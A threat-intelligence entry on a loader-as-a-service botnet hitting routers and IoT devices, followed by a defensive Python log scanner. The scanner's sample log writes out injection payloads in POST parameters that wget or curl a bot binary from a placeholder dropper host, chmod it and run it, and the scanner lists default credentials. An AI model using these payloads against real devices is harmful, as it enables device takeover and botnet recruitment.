Botnet Loader-as-a-Service Infrastructure Distributing RondoDoX and Mirai Payloads
Essential information
- Published
- 25/09/2025 23:21
- Modified
- 26/09/2025 11:56
- Tags
- 2025-09-25, CVE-2012-1823, CVE-2019-16759, CVE-2019-17574, botnet, command injection, cryptomining, iot, loader-as-a-service, mirai, morte, rondodox, soho routers
- Related entities
- 3 vulnerabilities (cve), 200 observables, 8 techniques (mitre), 3 malware, 2 others
Description
A botnet operation run on a Loader-as-a-Service model was uncovered through exposed command-and-control logs spanning six months. The campaign systematically targets SOHO routers, IoT devices and enterprise applications through command-injection flaws in their web interfaces. Its main vectors are injecting shell commands through unsanitized POST parameters, logging in with default credentials, and exploiting known CVEs (the entry tags CVE-2012-1823, CVE-2019-16759 and CVE-2019-17574). Attack volume spiked 230% across July and August 2025, and the loaders deliver multi-architecture malware, including Morte binaries, RondoDoX and Mirai payloads, and cryptomining payloads. With rapidly rotating infrastructure and a diverse malware set, the operation is evolving quickly, which calls for early detection of the injection and loader activity and robust defensive measures on exposed device web interfaces.
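The description above names command injection through unsanitized POST parameters on router and IoT web interfaces, followed by a fetch-and-execute loader stage, and default-credential logins as the campaign's main vectors. As an added example (not tooling from the report and not the campaign's own code), the following Python script applies those indicators to web-interface access-log lines. The log format (CLF with the raw POST body as a trailing quoted field), the endpoint paths, the addresses (TEST-NET ranges), the dropper URL and the binary names are all constructed for illustration and are not observables from the report.

```python
"""Scan web-interface access logs for the command-injection and loader-stage
patterns used to push Mirai-style multi-architecture bot binaries."""
import re
import urllib.parse
from dataclasses import dataclass, field

# ASSUMPTION: an access-log variant with the raw POST body appended as a trailing
# quoted field, the shape a reverse proxy or WAF with body logging would emit.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<body>.*)")?$'
)

# A parameter value breaking out into a shell: separators, pipes, backticks, $(...).
BREAKOUT_RE = re.compile(r"(;|\|\||&&|\||`|\$\(|\n)")
# Loader stage: fetch a binary from a dropper host, mark it executable, run it.
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
EXEC_RE = re.compile(r"(\bchmod\s+(\+x|[0-7]{3,4})\b|\bsh\s+\S+|(?:^|[;&|\s])\./\S+)", re.I)
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s;&|'\"`]+", re.I)

USER_KEYS = {"user", "username", "login"}
PASS_KEYS = {"pass", "password", "pwd"}
DEFAULT_CREDS = {("admin", "admin"), ("admin", "password"), ("root", "root"), ("admin", "")}


@dataclass
class Finding:
    line_no: int
    client: str
    path: str
    parameter: str
    indicators: list = field(default_factory=list)
    dropper_urls: list = field(default_factory=list)


def decode_value(raw: str, rounds: int = 3) -> str:
    """Undo URL encoding repeatedly; double encoding is a common filter bypass."""
    value = raw
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_body(body: str) -> dict:
    """Split a form body on '&' only, so a ';' inside a value survives for inspection."""
    params = {}
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        params[decode_value(name)] = decode_value(raw)
    return params


def classify_value(value: str) -> list:
    indicators = []
    if BREAKOUT_RE.search(value):
        indicators.append("shell-breakout")
    if FETCH_RE.search(value):
        indicators.append("loader-fetch")
    if EXEC_RE.search(value):
        indicators.append("exec-chain")
    return indicators


def scan_log(text: str) -> list:
    """Return one Finding per suspicious parameter or credential pair, in log order."""
    findings = []
    for line_no, line in enumerate(text.strip().splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m or not m.group("body"):
            continue
        params = parse_body(m.group("body"))
        for name, value in params.items():
            indicators = classify_value(value)
            # A lone separator is noisy; require two independent indicators.
            if len(indicators) >= 2:
                findings.append(Finding(line_no, m.group("ip"), m.group("path"), name,
                                        indicators, URL_RE.findall(value)))
        user = next((params[k] for k in USER_KEYS if k in params), None)
        pwd = next((params[k] for k in PASS_KEYS if k in params), None)
        if user is not None and pwd is not None and (user, pwd) in DEFAULT_CREDS:
            findings.append(Finding(line_no, m.group("ip"), m.group("path"),
                                    "credentials", ["default-credential"]))
    return findings


def dropper_hosts(findings: list) -> list:
    """Distinct hosts the loader stage pulls binaries from (blocklist candidates)."""
    return sorted({urllib.parse.urlsplit(u).hostname for f in findings for u in f.dropper_urls})


# Constructed sample lines: endpoint paths, addresses (TEST-NET ranges) and binary
# names are invented for illustration, not observables from the report.
SAMPLE_LOG = r'''
203.0.113.7 - - [12/Aug/2025:03:14:07 +0000] "POST /cgi-bin/diag_ping.cgi HTTP/1.1" 200 512 "target_addr=192.0.2.1;cd+/tmp;wget+http://198.51.100.23/bins/morte.arm7;chmod+777+morte.arm7;./morte.arm7&count=4"
203.0.113.7 - - [12/Aug/2025:03:14:09 +0000] "POST /cgi-bin/login.cgi HTTP/1.1" 200 200 "user=admin&pass=admin"
198.51.100.9 - - [12/Aug/2025:03:15:22 +0000] "POST /goform/set_client_cfg HTTP/1.1" 200 33 "time1=00:00-00:00&mac=%60curl%20http%3A%2F%2F198.51.100.23%2Fbins%2Fmorte.mips%20-o%20%2Ftmp%2Fm%3Bsh%20%2Ftmp%2Fm%60"
192.0.2.44 - - [12/Aug/2025:03:16:01 +0000] "POST /api/ping HTTP/1.1" 200 88 "host=example.org&count=3"
'''

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f.line_no} {f.client} {f.path} [{f.parameter}] {f.indicators} {f.dropper_urls}")
    print("dropper hosts:", dropper_hosts(results))
```

Two design points matter in practice. The body is split on `&` rather than handed to `urllib.parse.parse_qs`, because older Python versions also split on `;`, which would hide exactly the separator the injection relies on. And the default-credential check keys on the parameter names a login form would use, so it fires on the credential pair regardless of which endpoint path the device exposes; the set of names and credentials is a starting list to extend from your own fleet's interfaces.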